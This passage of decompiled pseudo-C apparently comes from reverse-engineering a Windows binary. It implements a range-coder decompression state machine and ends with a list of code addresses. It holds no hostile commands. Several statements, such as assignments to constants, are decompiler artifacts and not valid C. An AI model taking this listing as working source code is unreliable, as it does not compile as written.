											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406481
0x00406481
0x00406481
0x00406481
0x00406487
0x0040648b
0x0040648f
0x00406499
0x004064a7
0x0040677d
